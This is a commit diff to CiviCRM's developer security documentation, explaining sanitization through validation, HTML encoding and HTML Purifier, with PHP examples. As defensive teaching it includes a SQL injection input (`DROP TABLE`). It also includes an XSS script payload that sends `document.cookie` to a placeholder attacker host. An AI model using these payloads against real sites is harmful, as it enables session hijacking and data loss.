Commit 5c8cf6d8 authored by Sean Madsen

Security - explain sanitization

parent 59c00863
......@@ -35,9 +35,9 @@ With this attack, the response page would display the API key (for any contact t
!!! note
You might think that an input like ``0; DROP TABLE `civicrm_contact` `` would present an [even more serious a vulnerability](https://xkcd.com/327/), but fortunately CiviCRM does not allow [query stacking](http://www.sqlinjection.net/stacked-queries/) which means `executeQuery()` can only execute one query at a time.
### A improvement using sanitizing
### An improvement using sanitizing
In order to fix this security vulnerability, we need to sanitize either (or both!) the input or output as follows:
In order to fix this security vulnerability, we need to sanitize either the input or output (or both!) as follows:
```php
$contactId = CRM_Utils_Request::retrieve(
......@@ -56,6 +56,39 @@ $displayName = CRM_Core_DAO::executeQuery($query, array(
Now, users will only be able to send integers in, and CiviCRM will only be able to send integers out. This is obviously a simplified example, but it illustrates the concepts of inputs, outputs, and sanitizing.
## Sanitization methods
Sanitizing (also sometimes generally called "**escaping**") refers to the process of cleaning (or rejecting) data to protect against attacks.
### Validation
The most primitive way to sanitize untrusted data (as in the example above) is to throw an error when it does not conform to the expected format. This works well for data inputs which are of known (and simple) types, but can be much more difficult (and less effective) when used for *outputs* or complex data types.
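As a rough illustration of validation in plain PHP, the sketch below rejects anything that is not a positive integer. The helper name `requirePositiveInteger()` is hypothetical and is not part of CiviCRM; it only assumes PHP's built-in `filter_var()`.

```php
<?php
/**
 * Hypothetical helper (not a CiviCRM function): return the value as an
 * integer, or throw if it is not a positive integer.
 */
function requirePositiveInteger($value): int {
  // filter_var() returns FALSE when the value is not a valid integer
  // or is below min_range.
  $result = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
  if ($result === false) {
    throw new InvalidArgumentException('Expected a positive integer.');
  }
  return $result;
}

// A well-formed ID passes through as an integer.
$contactId = requirePositiveInteger('42');

// An injection attempt is rejected outright rather than cleaned up.
try {
  requirePositiveInteger('0; DROP TABLE `civicrm_contact`');
}
catch (InvalidArgumentException $e) {
  echo 'Rejected: ' . $e->getMessage() . PHP_EOL;
}
```

Rejecting the value, rather than trying to repair it, keeps the rule simple, which is why this approach suits inputs of known and simple types.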
### Encoding (aka "escaping") {:#encoding}
Encoding alters the untrusted data to suit a *specific output*.
For example, consider the following Smarty code:
```html
<div class="email">{$emailAddress}</div>
```
This works fine with an input of `foo@example.org`. But a string like `<script>window.location='http://attacker.example.com/?cookie='+document.cookie</script>` would present an [XSS](https://excess-xss.com/) vulnerability. If loaded in a victim's browser, this string would send the victim's cookies to the attacker's website and allow the attacker to masquerade as the user.
Using validation to reject email addresses containing characters like `<` or `>` would prevent the attack, but it would also prevent us from displaying email addresses like `Foo Bar <foo@example.org>`.
By *encoding* the data (for HTML), we change `Foo Bar <foo@example.org>` to `Foo Bar &lt;foo@example.org&gt;`. This prevents the attack and allows us to display any characters we wish.
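The transformation described above can be sketched in plain PHP with the built-in `htmlspecialchars()`. The wrapper name `encodeForHtml()` is an assumption made for this example, and this is not necessarily how CiviCRM or Smarty performs the encoding.

```php
<?php
/**
 * Hypothetical wrapper (not a CiviCRM function): encode a string for
 * embedding in HTML text or a quoted HTML attribute.
 */
function encodeForHtml(string $value): string {
  // ENT_QUOTES also encodes single and double quotes.
  return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$emailAddress = 'Foo Bar <foo@example.org>';

// Prints: <div class="email">Foo Bar &lt;foo@example.org&gt;</div>
echo '<div class="email">' . encodeForHtml($emailAddress) . '</div>' . PHP_EOL;
```

Because the angle brackets are turned into entities, the browser renders them as text instead of interpreting them as markup.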
!!! important
Encoding is specific to output mechanisms. Data embedded within HTML must be encoded differently from data embedded in an SQL query or a shell command.
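To make the point about output mechanisms concrete, the sketch below encodes the same untrusted string for three different destinations using PHP built-ins. It is illustrative only and does not show CiviCRM's own helpers; the variable names are arbitrary.

```php
<?php
$untrusted = 'Foo Bar <foo@example.org>';

// For HTML text or a quoted HTML attribute value.
$forHtml = htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

// For a URL query string parameter.
$forUrl = rawurlencode($untrusted);

// For a single argument on a shell command line
// (the exact quoting depends on the operating system).
$forShell = escapeshellarg($untrusted);

echo $forHtml . PHP_EOL;
echo $forUrl . PHP_EOL;
echo $forShell . PHP_EOL;
```

Each result is safe only in the context it was encoded for; the HTML-encoded string, for example, offers no protection when placed in a shell command.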
### Purification
In rare cases such as user-editable rich text fields, CiviCRM cannot use validation or encoding to protect against attacks because the same characters used in attacks are also necessary for presentation. For these cases, CiviCRM uses a 3rd-party library called [HTML Purifier](http://htmlpurifier.org/) which employs sophisticated techniques to [remove XSS](http://htmlpurifier.org/live/smoketests/xssAttacks.php) from HTML strings.
## Escape on Input vs. Escape on Output
Escaping on input means that developers ensure every input from their interfaces is properly escaped before it is passed into the database. This is a major problem for an application like CiviCRM because there are too many interfaces to escape on input reliably. There is also a risk that escaping on input dramatically changes the value and strips out some data. Escaping on output, by contrast, means that every interface which presents data must properly and safely account for the possibility that there may be unsafe data in the database, and must sanitize it for safe viewing or usage in, for example, HTML or AngularJS templating.
......